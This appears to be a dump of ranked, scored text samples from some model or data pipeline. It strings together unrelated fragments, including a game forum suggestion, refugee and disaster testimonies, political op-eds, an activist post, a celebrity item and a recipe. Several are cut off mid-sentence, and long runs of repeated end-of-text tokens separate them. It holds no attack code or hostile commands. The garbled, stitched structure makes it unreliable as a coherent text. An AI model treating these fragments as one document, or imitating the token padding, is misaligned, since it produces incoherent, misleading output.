https://us.battle.net/forums/en/overwatch/topic/20759239020 ) got locked, I am reposting the text here again. It is not really direct feedback to the resurrect, but rather a feature suggestion:I think it is important for a Mercy player to let your teammates know, that you can revive someone. If you can't or don't want to communicate in voice chat, there is no way telling your team besides typing it in the text chat (which obviously isn't pratical mid game).I would suggest to add this feature: If Mercy's resurrect is off cooldown / available for use, pressing the bound key (by default that's E) will let the player ping to their team that Mercy can resurrect (if there is no resurrection target in range of course). Also with the current Valkyrie, this pinging could also report the amount of resurrects (1 or 2) available, just like Symmetra with her teleporter charges. An other idea could be adding the amount of seconds left until the next resurrect is available to this ping message.Also, with this feature the existing voice lines of Mercy's former ultimate, could be used again ("I am ready to resurrect you", "I am ready to revive you") :)I would really appreciate this being a feature and I am keen to know what the community thinks about this.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 50; Score = 905216.0 +<|begin_of_text|>Noor Kajol, 10, comes from Rakhine State, Myanmar, which she fled in recent weeks. + +My name is Noor Kajol, and I am 10 years old. I was very happy in my old village because I was studying at the madrassa - I liked learning about the holy Quran, and I wanted to memorise all of it. I lived with my family; there were seven of us in total. The house was not very big, but I liked living there. + +We had to flee our homes because the military started shooting us. I was inside the house with my father when they shot him through the window. + +The bullet hit him in the head, he fell on the floor, and a lot of blood was coming out of his head. + +I was really scared, and I was crying a lot. We ran away, leaving my father in the house. The military burned the house down, even though my father was still inside. + +We had to run away to the forest and hide in the trees. We then walked for three days to get to Bangladesh. It was difficult for me because I was hungry and I missed my father a lot. + +Other people helped us cross the border for free, which was very nice of them. We travelled in a boat with an engine, but I did not enjoy the boat ride because I still missed my father. He was a woodcutter, and everyone liked him. He was a good-natured man, and he loved me a lot. + +I am very unhappy in Bangladesh because I miss my father so much. It is also very dirty here; there are no toilets or bathrooms. + +I would like the world to help us get our own country back or offer us another country that we could live in. + +*As told to Katie Arnold in Kutupalong new shelter camp near Cox's Bazar, Bangladesh. + +*This interview has been edited for clarity. + +The plight of Myanmar's Rohingya + +Nearly 400,000 Rohingya, mainly women and children, have fled to Bangladesh in the recent weeks as a result of indiscriminate violence against civilian populations carried out by the Myanmar army. + +The UN and other human rights organisations have warned that the mass exodus following killings, rapes, and burned villages are signs of "ethnic cleansing", pleading for the international community to pressure Aung San Suu Kyi and her government to end the violence. + +"The situation seems a textbook example of ethnic cleansing," UN human rights chief Zeid Ra'ad al-Hussein said on +================================================================================ +Rank = 51; Score = 892928.0 +<|begin_of_text|>© Raghu Rai / Magnum Photos + +The doctor whose hands were tied + +Dr D.K. Satpathy, aged 66, sits below a painting of what looks like his younger self surrounded by flying doves. He is relaxed, animated, but becomes increasingly emotional as he recalls that fateful night, 30 years ago, when Bhopal became the site of one of the world’s worst industrial disasters. + +From 2 to 3 December 1984, about 24 metric tonnes of methyl isocyanate (MIC), a highly volatile and deadly gas, escaped from the US-controlled Union Carbide pesticide plant in Bhopal. Thousands of people were living in shanty towns nearby. + +Like many of those people, Dr Satpathy was asleep when it happened. “Suddenly, at 4am, my professor comes to my home,” he recalls. “He is shouting at me to rush to the mortuary as fast as possible.” + +Dr Satpathy, a pathologist and former head of the state Medico-Legal Institute, immediately ran to Hamidia Hospital. As he approached, he found the road was full of people. + +“I saw thousands of people lying there. Some were wailing, some were gasping, some were crying. I couldn’t understand what was happening.” + +Mass cremation of victims held beside communal graves within days of the gas leak, 5 December 1984. © Raghu Rai / Magnum Photos + +As patients died around him, Dr Satpathy and his colleagues struggled to find a way to treat them. One doctor rang up a medical official at Union Carbide hoping to find out more. The official’s response, recalls Dr Satpathy, was that the accident had “something to do with… carbon monoxide” and that it was “not a serious matter”. His advice was to “put a wet cloth in their mouth and they will get well.” + +Shocked by this, Dr Satpathy, too, appealed to the Union Carbide official: “I told him, ‘Sir, I am Dr Satpathy. I am your student speaking. You are a citizen of Bhopal. Union Carbide is from a foreign country and here my people are dying. If you know anything, please tell me, so that at least we shall be able to extend some medical treatment.’ He replied saying, ‘I am a citizen of Bhopal. The people who are dying are my brothers. If I knew anything, I would have definitely told you. +================================================================================ +Rank = 52; Score = 888832.0 +<|begin_of_text|>The cast of NBC's "Saturday Night Live" poked fun at Donald Trump and Hillary Clinton during the opening episode of the show's new season. (NBC) + +From the voice and the facial expressions to the tan and the poorly tailored suit, Alec Baldwin rocketed to the top of the Donald Trump impersonators list on "Saturday Night Live" this weekend. The comedian flat-out nailed Trump's many idiosyncrasies. + +But Baldwin's impression of the Republican presidential nominee remained safely in the realm of absurdist humor, never venturing into the territory of truly biting satire. An article by The Washington Post's David Weigel asked Friday, "Can SNL take down Donald Trump? Is it going to try?" The answer, at least for now, appears to be no. + +As expected, the opening sketch Saturday parodied last week's presidential debate between Trump and Hillary Clinton. + +"Good evening, America," Baldwin-as-Trump said in his opening statement. "I am going to be so good tonight. I am going to be so calm and so presidential." + +With a boast and a locker-room joke, Baldwin immediately captured Trump's style. + +Later, Baldwin hit on three other Trump habits — repeating phrases, making excuses and peddling conspiracy theories: "My microphone is broken. She broke it. With Obama. She and Obama stole my microphone. They took it to Kenya. They took my microphone to Kenya, and they broke it, and now it's broken." + +Other jokes centered on Trump's hair, his pronunciation of "China" and his debate-night sniffles. It was funny stuff, but it is unlikely to satisfy critics such as comedian Samantha Bee, who a couple weeks ago shredded NBC for normalizing Trump through shows like "Saturday Night Live." + +"To its credit," Bee said on her weekly TBS show, "NBC did sever ties with Trump after he called Mexicans rapists — if by severing ties you mean inviting him on their flagship comedy programs to show millions of Americans what a fun guy he is." + +Last June, NBC said it was ending its business relationship with Trump, who had been the longtime host of "The Apprentice" and the network’s partner on telecasts of the Miss USA and Miss Universe pageants. Five months later, however, the network invited Trump to host "Saturday Night Live," and the real estate mogul has appeared with Jimmy Fallon on "The Tonight Show" three times since September 2015. + +[Donald Trump was supposed to be a gift to late-night TV, but comedians aren’t laughing] + + +================================================================================ +Rank = 53; Score = 888832.0 +<|begin_of_text|>Although I have been a so-called ‘black’ American and a social conservative all my life – and found the two aspects of my identity to be remarkably congruent – I am always surprised when confronted with some of the vitriol that I and my fellow black conservatives face when addressing the black community. I have often wondered why it is ok for other groups to maintain a diversity of political viewpoints – whether they are Asians, Latinos, or Jewish Americans – but black Americans seem to believe that anyone who does not vote the party line is a traitor to his or her race. + +Why is it that among African Americans anyone who does not support the Democrats or liberal causes is labeled a sell-out, or a ‘self-loathing’ black person? Are we not as diverse in our thinking as other groups? We should really avoid chastising each-other for thinking differently. Instead we should appreciate and celebrate our wonderfully diverse community. We should welcome diverse perspectives as an asset, not a liability. The more we do this, the faster we will grow as a community and attain mainstream success in America. + +Case in point; many were quick to chastise the pastors who opened the door for Donald Trump’s message to the black community; but where are those same people when it comes time to chastising the murderers in Chicago that are killing people? When it comes to Donald Trump though, it seems there is a special kind of disrespect. People hate Trump so much – and by default some of his black surrogates – that the discussion gets overheated before we even get a chance to discuss the issues. Now, I’m not going to pretend that Trump hasn’t been a magnate for controversy, whether intentionally or not, but surely we don’t all have to lose our heads just because something outrageous that might have been said by a candidate on the campaign trail. + +Since when has merely having a conversation become a prohibited act? The attitude in some parts of the black community seems to be, ‘I can’t even talk to you because I can’t understand how you can support Trump.’ But for business-people and others within the black community, we look at a guy like Donald Trump and we see an opportunity. Perhaps Trump’s not a perfect guy – who is? – but surely we can have a conversation about the things we have in common. + +For example, what about Obamacare? I own businesses with over a hundred employees. Obamacare has increased the overhead costs for health coverage significantly in my company. It has reduced the number of people (including African Americans) that I can +================================================================================ +Rank = 54; Score = 884736.0 +<|begin_of_text|>Posted 6 years ago on Sept. 23, 2012, 4:08 p.m. EST by OccupyWallSt + +Tags: police, s17, bloomberg, nyc + +The first anniversary of Occupy Wall Street was a joyous affair for the 99%. + +Yet regrettably, it was also a day that illustrated how Mayor Michael Bloomberg’s ‘private army’ has been increasingly unleashed to beat, arrest, imprison, and broadly suppress OWS. + +Please post your videos, photos, and stories about how your rights were infringed on the Occupy Bloomberg’s Army Facebook page. + +Occupy is a nonviolent movement, but this has not prevented Bloomberg’s Army from engaging in targeted arrests of specific organizers as well as random street ‘snatch and release’ intimidation tactics. + +On September 17th not even the constant drone of helicopters overhead could drown out the screams of ‘I’m a journalist’ from the reporters who were arrested merely for practicing their and our right to freedom of the press. + +And not even a cry of ‘I’m a City Councilmember’ was enough to staunch the established policy of brutality within the Mayor of Wall Street’s Police Department. + +The message being sent by Bloomberg’s Army is being heard loud and clear. In Bloomberg’s New York: anyone who supports Occupy Wall Street in any fashion is being made an example of. + +Were you one of these people extra-legally arrested or assaulted, or have you witnessed someone who was? + +Post your videos, photos, and stories on the Occupy Bloomberg’s Army Facebook page. + +We will not be stymied by the over 180 arrests on our anniversary, nor intimidated by the unprovoked and random nature of so many of them. + +We will fight for our right to protest Wall Street while we protest Wall Street itself. + +All Roads Lead To Wall Street + +-- from the ‘Your Inbox: Occupied’ team (click here to subscribe)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 55; Score = 884736.0 +<|begin_of_text|>Fuelling The Cycle Of Hate + +By Neve Gordon & Yigal Bronner + +27 January, 2009 + +Guardian.co.uk + +Israeli soccer matches were suspended during the assault on Gaza. When the games resumed last week, the fans had come up with a new chant: "Why have the schools in Gaza been shut down?" sang the crowd. "Because all the children were gunned down!" came the answer. + +Aside from its sheer barbarism, this chant reflects the widespread belief among Israeli Jews that Israel scored an impressive victory in Gaza – a victory measured, not least, by the death toll. + +Israeli pilots and tank commanders could not really discriminate between the adults and the children who hid in their homes or huddled in the UNRWA shelters, and yet they chose to press the trigger. Therefore, it is not at all surprising that the lethal onslaught left 1,314 Palestinians dead, of which 412 – or nearly one third of all of the casualties – were children. + +This latest assault underscores that Israel, not unlike Hamas, readily resorts to violence and does not distinguish between civilians and combatants (only the weapons at Israel's disposal are much more lethal). No matter how many times the Israeli government tries to blame Hamas for the latest Palestinian civilian deaths it simply cannot explain away the body count, especially that of the children. In addition to the dead, 1,855 Palestinian children were wounded, and tens of thousands of others have likely been traumatised, many of them for life. + +Every child has a story. A Bedouin friend recently called to tell us about his relatives in Gaza. One cousin allowed her five-year-old daughter to walk to the adjacent house to see whether the neighbours had something left to eat. The girl had been crying from hunger. The moment she began crossing the street a missile exploded nearby and the flying shrapnel killed her. The mother has since been bedridden, weeping and screaming, "I have let my girl die hungry". + +As if the bloody incursion was not enough, the Israeli security forces seem to be keen on spreading the flames of hatred among the Arab population within Israel. Hundreds of Palestinian citizens of Israel have been arrested for protesting at the Israeli assault and more than 200 of them are still in custody. One incident is enough to illustrate the psychological effect these arrests will likely have on hundreds more children. + +A few days after the ceasefire, several men wearing black ski masks stormed the home of Muhammad Abu Humus. They came to arrest him for protesting against the +================================================================================ +Rank = 56; Score = 880640.0 +<|begin_of_text|>The ACLU has intervened in the case of a lesbian high school student in Alabama whose principal has forbid her from attending prom with her girlfriend: + +"Cynthia Stewart, a 17-year-old junior at Tharptown High School in + +northern Alabama, is a member of her school’s prom planning committee, + +had personally raised over $200 for the prom, and created the theme her + +classmates had chosen for the dance. She is also an out lesbian. When Cynthia approached her principal to ask if she could bring her + +girlfriend with her to the prom, he said no. He also made Cynthia + +remove a sticker she was wearing that said, 'I am a lesbian,' telling + +her, “'You don't have that much freedom of speech at school.' Cynthia’s + +aunt and guardian, Kathy Baker, then appealed the principal’s decision + +to the school board. But the board let the decision to bar Cynthia + +from bringing her girlfriend to the prom stand." + +The school has apparently threatened to cancel the prom for everyone should Stewart bring her girlfriend. + +UPDATE: School reconsidering request!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 57; Score = 880640.0 +<|begin_of_text|>You know Erykah Badu has always been one to push the envelope. And things really haven’t changed. Recently, a video of the singer serenading a group of nuns is being shared all around social media. + +And Badu wasn’t exactly singing “Ava Maria.” Instead, she sang the first couple of lines from Kendrick’s hit song, “B*tch, Don’t Kill My Vibe.” + +She didn’t cuss or anything instead, she sang the chords, “I am a sinner who’s probably going to sin again. Loord…” and then the video cuts off but not before Badu records the nun’s reactions. + +Many people, including myself, found the video hilarious. The way I see it, if she stopped with those lyrics then she should be good, most Christians agree that we’re all sinners. But others think she took things a little too far. + +What do you think was this funny or is this a little blasphemous?<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 58; Score = 876544.0 +<|begin_of_text|>Happy New Year everyone! I have been on a short hiatus (and I’ll be honest, a bit of a food splurge) over the holiday period. It was nice to take a couple of weeks off to enjoy with both family and friends and to take a bit of a break away from work and the daily stresses of life. + +So today marks the first day back to clean eating and getting back into shape. I have definitely packed on a few pounds over the holiday period so it’s time to start afresh and get my diet back in order. But of course it feels like a bit of an effort preparing meals when you have been lying on a beach for a week and snacking on chips whenever you feel hungry. But no matter how easy fast food is, it’s never the same as a fresh home cooked meal and definitely never as satisfying. + +So without further ado, here’s a clean eating recipe for lime chicken that is really, really, really easy to make and takes very little time to make. + +Ingredients: + +For Lime Chicken- + +4 tablespoons lime juice + +3 tablespoons olive oil + +1kg chicken breast (approx 2.2 pounds) + +4 tablespoon of finely chopped coriander + +1 pinch salt + +For Salsa- + +1 large tomato, diced + +1 small white onion, diced + +1 large cucumber, chopped + +1 pinch salt + +3 tablespoons lime juice + +pepper, to taste + +Method: + +To marinate the chicken, combine the lime juice, olive oil and coriander in a bowl. Add the chicken and let it sit for about 5 minutes. Drain the liquid and season with salt. Meanwhile, heat olive oil in a pan over medium heat. When the pan is hot, add the chicken and cook until browned through. Drain any remaining liquid. In a separate bowl combine the tomato, cucumber, onion, lime juice, salt and pepper. Plate the chicken and top with salsa (I added some brown rice to my meal as well). + +There you have it, quick and easy and nice and clean! Serve 4 and can easily be packed away for a desk lunch. + +Happy New Year! + +– Sweet Cinnamon Sin + +Advertisements<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 59; Score = 864256.0 +<|begin_of_text|>Because no Internet meme is validated unless it comes out 